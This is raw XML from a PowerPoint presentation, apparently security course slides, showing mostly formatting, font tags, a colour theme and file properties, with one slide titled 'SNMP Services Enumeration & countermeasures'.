          <a:bodyPr vert="horz" lIns="381000" tIns="0" rIns="0" bIns="0" numCol="1" spcCol="0" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr lang="en-US" sz="2800" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" lvl="1" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" lvl="2" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" lvl="3" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" lvl="4" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" lvl="5" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" lvl="6" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" lvl="7" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" lvl="8" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" cap="all" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Unica One"/>
              </a:rPr>
              <a:t>1. SNMP Services Enumeration &amp; countermeasures</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Image 4">
            <a:extLst>
              <a:ext uri="{6CA3AE62-2CEB-40C8-9374-BD6451E958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147EDC-0724-4553-908F-1A531D239945}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect r="71670"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8422872" y="0"/>
            <a:ext cx="721128" cy="900112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{97421AF5-5738-4A3F-B752-7CB3C52B659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626391689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EBFONT2" val="Dosis-medium"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:5:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag11.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:9:0:0" val="5"/>
  <p:tag name="FONTWEIGHT:10:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag12.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:27:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag13.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:5:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:6:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:8:0:0" val="5"/>
  <p:tag name="FONTWEIGHT:7:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:8:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:5:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:5:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:5:0:0" val="5"/>
  <p:tag name="FONTWEIGHT:11:2:0" val="5"/>
  <p:tag name="FONTWEIGHT:11:1:0" val="5"/>
  <p:tag name="FONTWEIGHT:11:4:0" val="5"/>
  <p:tag name="FONTWEIGHT:11:3:0" val="5"/>
  <p:tag name="FONTWEIGHT:11:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:5:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="FONTWEIGHT:5:0:0" val="5"/>
  <p:tag name="FONTWEIGHT:8:0:0" val="5"/>
  <p:tag name="FONTWEIGHT:7:0:0" val="5"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office Theme">
  <a:themeElements>
    <a:clrScheme name="SCRUM">
      <a:dk1>
        <a:srgbClr val="313131"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="212745"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D9E6FB"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="3478B6"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="47BEA8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="8EB91E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="D14B24"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FEC862"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A983F4"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="C22EE5"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="CA79D1"/>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SCRUM">
      <a:dk1>
        <a:srgbClr val="313131"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="212745"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D9E6FB"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="3478B6"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="47BEA8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="8EB91E"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="D14B24"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FEC862"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A983F4"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="C22EE5"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="CA79D1"/>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4390</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>430</Paragraphs>
  <Slides>43</Slides>
  <Notes>0</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Dosis</vt:lpstr>
      <vt:lpstr>Unica One</vt:lpstr>
      <vt:lpstr>Dosis-medium</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Calibri-medium</vt:lpstr>
      <vt:lpstr>Roboto</vt:lpstr>
      <vt:lpstr>Dosis Light</vt:lpstr>
      <vt:lpstr>Dosis Regular</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>fkGroteskNeue</vt:lpstr>
      <vt:lpstr>Google Sans</vt:lpstr>
      <vt:lpstr>Nunito</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Information &amp; network security</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>1. SNMP Services Enumeration &amp; countermeasures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PROFESSOR ADMIN</cp:lastModifiedBy>
  <cp:revision>9</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-08T18:51:51Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-12T15:25:25Z</dcterms:modified>
</cp:coreProperties>
</file>